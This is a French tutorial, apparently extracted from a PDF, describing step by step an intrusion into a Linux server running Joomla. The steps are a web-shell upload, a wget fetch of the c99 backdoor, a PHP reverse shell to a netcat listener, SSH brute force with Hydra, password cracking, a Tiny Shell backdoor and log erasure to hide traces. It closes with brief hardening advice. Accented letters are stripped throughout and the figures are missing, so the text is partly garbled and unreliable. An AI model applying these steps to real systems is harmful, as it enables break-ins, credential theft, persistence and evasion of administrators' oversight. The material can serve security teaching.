Professional Documents
Culture Documents
Sommaire
Glossaire .................................................................................................................................................. 3 Table des illustrations.............................................................................................................................. 5 Introduction............................................................................................................................................. 7 La mthodologie utilise ......................................................................................................................... 8 La collecte dinformations ................................................................................................................... 9 La recherche de vulnrabilits .......................................................................................................... 10 Llvation de privilges .................................................................................................................... 16 Elvation de privilges par exploit local ........................................................................................ 16 Elvation de privilges par laccs SSH.......................................................................................... 22 La rcupration dinformations......................................................................................................... 24 Dcrypter les mots de passe des utilisateurs Linux....................................................................... 24 Dcrypter les mots de passe des utilisateurs Joomla.................................................................... 25 Installation dune porte drobe ...................................................................................................... 28 Leffacement des traces .................................................................................................................... 30 Se protger ........................................................................................................................................ 32 Conclusion ............................................................................................................................................. 33 Outils utiliss ......................................................................................................................................... 34 Bibliographie.......................................................................................................................................... 36
Page 2
Glossaire
Cheval de troie (Backdoor) Dans un logiciel, une porte drobe est une fonctionnalit inconnue de l'utilisateur lgitime, qui donne un accs secret au logiciel. Utilis par les pirates pour garder un accs aux systmes pntrs. http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e
CMS (Content Management System) Famille de logiciels destins la conception et la mise jour dynamique de site Web ou d'application multimdia (exemple : Wordpress, Joomla, etc).
Exploit Elment de programme permettant un individu ou un logiciel malveillant d'exploiter une faille de scurit informatique. http://fr.wikipedia.org/wiki/Exploit_%28informatique%29
Pare-feu (firewall) Outil matriel ou logiciel qui permet d'appliquer une politique d'accs aux ressources rseau. http://fr.wikipedia.org/wiki/Pare-feu_%28informatique%29
Reverse-shell Shell invers (plutt quun client se connecte un serveur, cest le serveur qui se connecte au client) http://assos.centrale-marseille.fr/ginfo/content/reverse-shell
Page 3
Rootkit Ensemble de techniques mises en uvre par un outil afin de demeurer furtif et cach sur un systme. http://fr.wikipedia.org/wiki/Rootkit
Scan de ports Technique permettant de connatre les services accessibles dune machine. Utilis lors des phases de recherche dinformations. http://www.cgsecurity.org/Articles/scan_port.html
Page 4
Figure 43 Gestionnaire de mises jour ................................................................................................. 20 Figure 44 Fichier /etc/shadow............................................................................................................... 22 Figure 45 Contenu du fichier /etc/passwd ............................................................................................ 22 Figure 46 Attaque sur l'accs SSH ......................................................................................................... 22 Figure 47 Mot de passe du compte ohm .............................................................................................. 22 Figure 48 Accs SSH sur le serveur web ................................................................................................ 23 Figure 49 Droit du compte Ohm............................................................................................................ 23 Figure 50 Connexion en root ................................................................................................................. 23 Figure 51 Fichier /etc/passwd ............................................................................................................... 24 Figure 52 Fichier /etc/shadow............................................................................................................... 24 Figure 53 Assemblage des fichiers Unix ................................................................................................ 24 Figure 54 Crackage des comptes Unix ................................................................................................... 25 Figure 55 Interface phpmyadmin .......................................................................................................... 25 Figure 56 Script python cracker phpmyadmin ...................................................................................... 25 Figure 57 Mot de passe phpmyadmin dcouvert ................................................................................. 26 Figure 58 Base de donnes Joomla ....................................................................................................... 26 Figure 59 Table des utilisateurs ............................................................................................................. 26 Figure 60 Informations lies aux utilisateurs ........................................................................................ 26 Figure 61 Users Joomla.......................................................................................................................... 26 Figure 62 Hash Joomla........................................................................................................................... 27 Figure 63 Script de cassage des mots de passe Joomla ........................................................................ 27 Figure 64 Cassage des mots de passe Joomla ....................................................................................... 27 Figure 65 Backdoor Unix ....................................................................................................................... 28 Figure 66 Tlchargement de Tsh ......................................................................................................... 28 Figure 67 Documentation Tiny Shell ..................................................................................................... 28 Figure 68 Installation de la backdoor .................................................................................................... 28 Figure 69 Test du fonctionnement de la backdoor ............................................................................... 29 Figure 70 Historique des commandes excutes.................................................................................. 30 Figure 71 Effacement de l'historique .................................................................................................... 30 Figure 72 Description de Linux Log Eraser ............................................................................................ 31 Figure 73 Liste des logs contenant notre adresse IP ............................................................................. 31 Figure 74 Changer l'adresse Ip prsentes dans les logs ........................................................................ 31 Figure 75 Utilisation de Linux Log Eraser .............................................................................................. 31 Figure 76 Outil Chrootkit en action ....................................................................................................... 32
Page 6
Introduction
Cet article a pour but d'expliquer la mthodologie gnralement retenue par les pirates pour s'introduire dans un systme informatique. Il vise expliquer comment compromettre un systme afin de mieux pouvoir s'en prmunir. En effet, la meilleure faon de protger son systme est de procder de la mme manire que les pirates afin de cartographier les vulnrabilits du systme. Nous allons voir comment exploiter les vulnrabilits dun poste afin den prendre le contrle.
Le poste cible est un ordinateur sous Linux (Ubuntu) hbergeant un site web sous Joomla.
Page 7
La mthodologie utilise
Le scnario standard dun test dintrusion vis--vis dune machine cible est le suivant : Collecte dinformations : via diffrents outils, lattaquant cherche obtenir le maximum dinformations sur la cible : systme dexploitation, logiciels installs, services actifs, login des utilisateurs ayant accs la cible. Recherche de vulnrabilits : via des scanneurs rseau (par exemple nessus pour le monde open source, Acunetix, n-stealth pour les logiciels propritaires), lattaquant va aprs la phase de collecte dinformations, chercher identifier et recenser les failles de scurit sur les services et/ou les applications disponibles. Une fois ces informations obtenues, il pourra faire des recherches sur des bases de donnes (Security-Focus, CVE, Exploit-DB, Metasploit) pour trouver des versions/failles exploitables, et le cas chant, rcuprer un code dexploitation (exploit) Exploitation : partir des informations prcdentes, lattaquant cherchera exploiter un service/application vulnrable via un code dexploitation. Si pas de failles dcouvertes, il peut aussi tenter des attaques par force brute ou par dictionnaire afin de dcouvrir les login/mots de passe des utilisateurs Elvation de privilges : une fois un accs la machine obtenu, lattaquant cherchera obtenir assez dinformations (comptes administrateurs, vulnrabilits locales) afin de raliser le plus doprations sur la cible. Lobjectif tant de devenir super-utilisateur (administrateur / root) Rcupration dinformations : une fois administrateur sur le poste, lattaquant va chercher obtenir le maximum dinformations disponibles : mot de passe, partages rseau, extraction de la base Active Directory (base des comptes utilisateurs) Effacement des traces : afin que lattaque reste la plus furtive possible, lattaquant cherchera au maximum effacer ses traces (suppression des logins locaux, effacement des fichiers logs, historique shell) Installation dune porte drobe : afin de pouvoir se reconnecter plus tard sur la cible en minimisant les risques dtre dtect, lattaquant pourra installer une porte drobe (exemple : rootkit1 pour masquer des processus, daemons rseaux, fichiers) Tentative de rebond : partir de laccs une premire machine, lattaquant pourra sen servir afin de dcouvrir et daccder dautres cibles (contournement rgles de filtrage dans une DMZ, rcupration de cls SSH pour se connecter un autre serveur)
http://fr.wikipedia.org/wiki/Rootkit
Page 8
La collecte dinformations
On commence par un scan de ports afin de dterminer quels sont les services accessibles.
Nous constatons quil y a un accs SSH (port 22) ainsi quun serveur Web daccessible (port 80). Commenons par analyser le serveur web. Pour cela, on ouvre notre navigateur et on tape ladresse IP de notre machine cible.
On constate rapidement que le site web fonctionne avec un CMS de type Joomla. Pour dtecter un site web fonctionnant sous un CMS, on peut utiliser lapplication WhatWeb2. Cest un outil Open Source permettant didentifier les applications fonctionnant derrire des serveurs Web : CMS, platesformes de blogs, serveurs (Apache, IIS) et autres.
WhatWeb a dtect que la version de Joomla utilise tait la 1.5. Il nous reste maintenant savoir sil existe des vulnrabilits concernant cette version de Joomla.
http://www.morningstarsecurity.com/research/whatweb
Page 9
La recherche de vulnrabilits
Pour dtecter les vulnrabilits lies Joomla, on utilise loutil Joomscan3. Joomscan permet de scanner un site web sous Joomla et dindiquer quelles sont les vulnrabilits dcouvertes.
TinyMCE est un des composants de Joomla, celui-ci souffre de nombreuses vulnrabilits dont une qui permet lupload de fichiers sur le serveur. Il nous suffirait duploader un shell sur le serveur web ce qui nous permettrait davoir un premier accs au poste cible.
http://sourceforge.net/projects/joomscan/
Page 10
Pour exploiter cette faille, nous allons utiliser Metasploit4. Metasploit est un framework permettant de fournir des informations sur des vulnrabilits et de les exploiter. Nous commenons par rechercher lexploit correspondant la vulnrabilit dcouverte dans Joomla.
Puis nous configurons lexploit en indiquant ladresse du serveur Web que nous visons ainsi que le chemin de Joomla.
En utilisant la commande <check de Metasploit, nous pouvons dterminer si notre cible est bien vulnrable, ce qui semble tre le cas.
Mme si la cible est bien vulnrable, Metasploit na pas pu uploader de fichier et na donc pas pu tirer parti de la vulnrabilit. Nous poursuivons nos recherches sur Internet afin de dcouvrir un autre exploit qui on lespre sera plus fonctionnel. En utilisant le site ExploitSearch5, qui est un moteur de recherche pour les exploits, nous dcouvrons un code exploitable pour la mme vulnrabilit.
4 5
http://www.metasploit.com/ http://www.exploitsearch.net/
Page 11
Afin dexploiter la vulnrabilit, nous avons un script PHP. Une fois tlcharg et configur pour viser notre poste cible, nous lexcutons.
Le fichier shell.php contient une ligne qui permet dexcuter des commandes distance.
Pour faire excuter une commande distance sur le serveur web, il suffit dappeler notre script php et de lui passer une commande en paramtre. Par exemple, en passant en paramtre <cat /etc/password>, nous voyons le contenu du fichier sur le serveur distant.
Page 12
Nous voyons alors le rsultat de lexcution de notre commande dans notre navigateur (ici laffichage de /etc/password)
Nous avons dsormais un accs distance sur le serveur web. Afin dutiliser un shell plus volu (interface graphique), nous tlchargeons c99, qui est une backdoor PHP avec une interface graphique. Pour uploader cette backdoor sur le poste distance, nous utilisons notre shell (commande : wget http://<adresse_de_notre_backdoor>). Une fois notre backdoor uploade sur le serveur, celle-ci est accessible en tapant simplement son adresse.
Nanmoins parfois les pare-feux et autres outils de scurit bloquent les accs et il peut tre difficile de les traverser. Afin de contourner cette problmatique, nous pouvons utiliser un reverse-shell. Un reverse-shell, cest quand on force lordinateur de la cible se connecter notre ordinateur plutt que linverse (normalement on met en place un shell sur lordinateur distant et cest notre ordinateur qui sy connecte).
Page 13
Il nest pas possible pour le pirate de se connecter sur le port 4444 car ce port est bloqu par le parefeu pour une connexion entrante (connexion qui vient de lextrieur). Avec le reverse-shell, le poste du pirate est en attente de connexion sur le port 4444, et cest le serveur vulnrable qui va initier la connexion. Comme cest une connexion sortante, et que celle-ci est initie par un poste lintrieur du rseau, celle-ci pourra traverser le pare-feu.
Pour mettre en place notre reverse-shell, nous allons utiliser loutil php-reverse-shell6.
Pour utiliser cet outil, il faut dabord le configurer et indiquer ladresse laquelle notre script doit se connecter.
Avant de lancer notre script, nous devons nous mettre en coute afin que lordinateur distance puisse se connecter nous. Pour cela, on utilise loutil netcat7. Netcat est un utilitaire Unix simple qui permet de grer les sockets (connexions rseaux), cest--dire quil est capable dtablir nimporte quelle connexion un serveur, en choisissant le port, lIP etc. Nous configurons netcat pour quil soit en attente de connexion sur le port 1234 (le port configur dans notre fichier php-reverse-shell).
http://pentestmonkey.net/tools/web-shells/php-reverse-shell http://netcat.sourceforge.net/
Page 14
Une fois Netcat en attente de connexion, nous excutons le fichier php-reverse-shell sur le serveur distant.
Une fois excut sur notre machine cible, le script se connecte directement sur notre machine. Voil ce qui saffiche sur notre poste.
Maintenant que nous avons un accs depuis notre machine, la prochaine tape va tre dlever nos droits utilisateurs afin de devenir administrateur de la machine. Ceci nous permettra de contrler totalement la machine cible et de pouvoir en garder le contrle (installation de backdoors volues, nettoyage des fichiers logs, rcupration des mots de passe des utilisateurs, etc.)
Page 15
Llvation de privilges
Le compte que nous utilisons pour notre shell a des droits limits. Il sagit du compte <www-data>, qui permet la gestion du serveur web.
Notre prochaine tape est donc dobtenir les droits du compte administrateur (root) ce qui nous permettra deffectuer toutes les actions que nous souhaitons : installation dune backdoor, effacement des fichiers logs, cassage des comptes utilisateurs, etc.
En gros, nous allons rcuprer le maximum dinformations, puis une fois des vulnrabilits dtectes, puis rechercher des codes dexploitation sur les sites suivants : www.exploit-db.com www.securityfocus.com www.packetstormsecurity.org web.nvd.nist.gov/view/vuln/search
Page 16
Pour dterminer la prsence dune imprimante, on peut taper la commande <lpstat a>
Ces informations seront importantes pour savoir quel type dexploit utiliser et leur version.
Page 17
Liste des processus excuts par root : <ps aux | grep root>
La liste des processus excuts par le compte root et qui peuvent savrer vulnrables : <ps ef | grep root>
Connatre les applications installes : <ls alh /usr/bin | less> / <ls alh /sbin>
Page 18
Liste des utilisateurs ayant cre une crontable8 : <ls alh /var/spool/cron>
Liste des utilisateurs et des machines connects avec la machine : <lsof i> Liste des connexions Internet actives : <netstat antup>
http://aasoftware.eu/index2.php?option=com_docman&task=doc_view&gid=25&Itemid=30
Page 19
Ide personnelle pour connatre les vulnrabilits dun systme : Lancer le gestionnaire de mises jour (ou en ligne de commande <update-manager>)
Page 20
Page 21
Nous dcouvrons quil y a 4 comptes intressants : ohm sophia martin albert. Pour chacun de ses comptes, nous allons tenter de dcouvrir le mot de passe. Pour cela, nous allons lancer une attaque sur laccs ssh avec le nom de chaque utilisateur. Selon le fichier </etc/passwd> qui contient la liste des utilisateurs du systme, le compte ohm est celui qui possde les droits les plus levs.
Nous allons donc tenter de dcouvrir quel est le mot de passe associ au compte ohm. Pour cela, nous allons utiliser loutil Hydra9. Hydra est un crackeur qui fonctionne pour plusieurs protocoles : ftp, ssh, http Nous configurons Hydra afin que celui-ci tente de dcouvrir le mot de passe associ au compte ohm.
http://thc.org/thc-hydra/
Page 22
Une fois le mot de passe dcouvert, nous nous connectons avec le compte ohm sur laccs ssh.
Nous constatons que ce compte fait parti du groupe admin. Nous allons pouvoir nous connecter en root en tapant la commande <sudo s>
Nous sommes maintenant connects en root. Nous allons pouvoir passer la phase de rcupration dinformations. Cette phase consiste en la collecte des comptes utilisateurs et de leur mot de passe associ.
Page 23
La rcupration dinformations
Maintenant que nous sommes root sur la machine, nous pouvons rcuprer les informations disponibles sur le systme. Les informations les plus intressantes rcuprer pour un attaquant sont les mots de passe des comptes de la machine. Comme nous savons quil y a aussi un serveur web hbergeant Joomla, nous allons aussi rcuprer les mots de passe des utilisateurs Joomla.
Ce fichier contient uniquement les comptes ainsi que les droits associs. Il ne contient pas les mots de passe des utilisateurs. Les mots de passe eux se trouvent dans le fichier /etc/shadow
Pour cracker les mots de passe, on peut utiliser loutil John the ripper 10. Cest un logiciel libre de cassage de mot de passe, utilis notamment pour tester la scurit d'un mot de passe. Pour pouvoir cracker ce mot de passe, il faut re-assembler les 2 fichiers pour nen former plus quun seul. Cest ce que la commande <unshadow> va nous permettre de faire.
Une fois les 2 fichiers assembls, on utilise John pour trouver les mots de passe associs chaque compte.
10
http://www.openwall.com/john/
Page 24
Selon la complexit des mots de passe, le temps pour les trouver peut tre plus ou moins long (voir si le mot de passe est trs complexe, impossible trouver en un temps raisonnable).
Par dfaut, le compte root de phpmyadmin a un mot de passe vide. Nanmoins pour augmenter la difficult, jai protg laccs phpmyadmin par un compte <admin> avec un mot de passe simple. Le script <phpmyadmin_bruteforce.py> teste une liste de mots de passe passe en paramtre (fichier dictionnaire).
11
http://www.phpmyadmin.net/home_page/index.php
Page 25
Une fois le mot de passe dcouvert, on se connecte phpmyadmin et on slectionne la base de donnes Joomla.
Cette table contient lensemble des informations des utilisateurs : nom, courriel, type de compte. Le mot de passe est stock en md512. Le md5 est une fonction de hashage mathmatique permettant de calculer lempreinte numrique dun fichier ou dune chane de caractre.
http://fr.wikipedia.org/wiki/MD5
Page 26
Le mot de passe est aussi compos dun salt qui est une cl de cryptage gnre alatoirement. Cela permet de complexifier le mot de passe. Chaque login est donc stock sous la forme : compte : <password> :<salt>
Lorsquun utilisateur sauthentifie, le mot de passe quil a saisi est concatn avec $salt, puis crypt en md5 et enfin compar md5($password.$salt). Vient maintenant le moment du cassage des mots de passe. Pour cela, nous utilisons le script <joomla-cracker13>. Idem que pour phpmyadmin, cest un script qui teste diffrents mots de passe
A partir dune liste de mots, le script calcule son empreinte md5 puis la compare avec une liste de hash (les hash que nous avons rcupr de Joomla). Si les 2 valeurs correspondent, cest quon a dcouvert le bon mot de passe. Le fichier <Password.txt> contient une liste de mots, le fichier <hash.txt > contient la liste des utilisateurs de Joomla.
Grce ce script, on a pu dcouvrir les mots de passe de certains utilisateurs sous Joomla. Limportant dans ce type de script est le nombre de mots de passe tests. Avec un bon dictionnaire, on peut trouver en gnral 3 mots de passe sur 4.
13
http://web-vuln.blogspot.com/2010/01/cracking-password-joomla-hash-md5salt.html
Page 27
14
http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/tsh-0.6.tgz
Page 28
La backdoor tant installe sur notre systme cible, reste tester son bon fonctionnement. Pour cela, on utilise le client disponible dans larchive et on se connecte avec sur notre cible.
Nous avons dsormais une backdoor installe sur le systme cible qui nous permettra ainsi de le contrler distance. Le souci avec cette backdoor est que celle-ci nest pas discrte. Elle ne contient pas de fonctions qui lui permettent de se cacher sur un systme (masquage des processus et des fichiers, etc.). Pour rendre celle-ci plus furtive, nous pourrions par exemple utiliser un rootkit15. Un rootkit est un ensemble de techniques permettant de rendre furtif un accs sur un systme.
La prochaine tape importante de notre intrusion est de cacher les traces de notre passage.
15
http://fr.wikipedia.org/wiki/Rootkit
Page 29
Par exemple, en tapant la simple commande <history>, nous avons accs lensemble des commandes excutes, parmi lesquelles figurent les traces des modifications que nous avons effectu :
L on peut voir par exemple les url des backdoors (c99) tlcharges sur le poste. Pour supprimer lhistorique, on peut par exemple utiliser la commande suivante :
Nanmoins cette mthode nest pas subtile et risque de mettre la puce de loreille de ladministrateur (il est trs suspect que tous les logs de la machines soient vides). De plus, il existe de nombreuses autres traces et il peut tre difficile et fastidieux de supprimer tous les fichiers logs un par un. Il existe des outils qui permettent dexcuter cette tche de manire automatique. Un de ces outils est par exemple <Linux Log Eraser 16> qui permet de rechercher des donnes compromettantes et de les supprimer.
16
http://packetstormsecurity.org/files/view/102532/Linux-Log-Eraser-1.0.tar.gz
Page 30
Aprs tlchargement et installation de loutil, on peut dbuter son utilisation en lui ordonnant de chercher tous les logs qui contiennent notre adresse IP.
On a alors la liste des fichiers logs qui contiennent notre adresse IP. On peut aussi par exemple commander au logiciel de changer notre adresse IP par une autre afin de compliquer lanalyse.
On peut aussi lui demander de supprimer les logs des tlchargements de nos backdoors, etc.
Cet outil permet de sassurer quon a laiss le moins de traces possibles derrire nous. Attention supprimer lhistorique des commandes aprs sa dsinstallation.
Page 31
Se protger
Pour se protger, il nexiste pas de techniques miracles, le but est de compliquer au maximum la vie des attaquants. Sous linux, on peut significativement le niveau de scurit dun serveur en : Activer le blocage de compte et la dtection dintrusion (si elle tait activ sur laccs SSH, cela aurait vit une attaque de brute force) des comptes utilisateurs Installer un utilitaire de type Tripwire17 afin de dtecter les modifications apportes sur un systme et met une alerte chaque fois quun fichier protg a t modifi. Cela facilite le travail dinvestigation et de surveillance. Lutilisation de mots de passe forts bien sr. Attention aux points dentre partir des sites web comme a a t le cas pour Joomla qui souffrait de nombreuses vulnrabilits. Tenir son systme jour Dsactiver les services inutiles ou non utiliss Sous Linux, pour dtecter certains malwares et certaines modifications suspectes apportes au systme, on peut utiliser loutil <chkrootkit18>
La mise en applications de ces techniques permet de diminuer les points dentres possibles pour une intrusion et/ou en maitriser laccs.
17 18
http://www.tripwire.org/ http://www.chkrootkit.org/
Page 32
Conclusion
Sur un systme Unix bien configur, il peut tre parfois difficile dlever ses privilges afin de devenir root. Nanmoins les systmes Linux tant parfois moins soumis aux attaques que les systmes Windows (concernant les clients en tout cas), ils sont parfois moins scuriss (pas dantivirus, de dtection dintrusion, etc.) Le souci, cest que les serveurs web sous Unix sont beaucoup utiliss pour hberger des applications web, et que celles-ci permettent un point dentre sur le systme. Par exemple, Joomla souffre de nombreuses vulnrabilits dcouvertes priodiquement et on nest parfois pas labri dexploits pour lesquels il nexiste pas de correctifs.
Nanmoins, force est dadmettre que dans la ralit, laccs la machine naurait pas t si facile du fait que les serveurs web accessibles sur Internet sont bien souvent (mme quasiment toujours) protgs par un pare-feu et que laccs SSH est scuris (blocage aprs plusieurs tentatives infructueuses, restriction par adresse IP, etc.).
Page 33
Outils utiliss
C99 Backdoor en php
Hydra Crackeur de mot de passe rseau supportant de nombreux protocoles (Telnet, http, ftp) http://www.thc.org/thc-hydra/
Linux Log Eraser Permet de rechercher des donnes dans les fichiers logs et de les supprimer http://packetstormsecurity.org/files/view/102532/Linux-Log-Eraser-1.0.tar.gz
Metasploit Plate-forme permettant de tester et dexploiter les vulnrabilits dun systme. http://www.metasploit.com/ Cdric BERTRAND : Intrusion dun serveur http://lepouvoirclapratique.blogspot.com Page 34
Nmap Ce logiciel permet de dtecter si une machine est prsente sur un rseau et d'identifier les services quelle hberge. http://nmap.org/
Phpadmin_bruteforce Script python pour trouver des mots de passe sur phpmyadmin http://www.c0dezone.com/darkc0de/others/pmabf.py
Php-reverse-shell Permet douvrir un reverse shell partir d'un simple script PHP http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Whatweb Outil permettant didentifier les applications fonctionnant derrire des serveurs Web http://www.morningstarsecurity.com/research/whatweb
Page 35
Bibliographie
Cracking Joomla Hash http://web-vuln.blogspot.com/2010/01/cracking-password-joomla-hash-md5salt.html
Page 36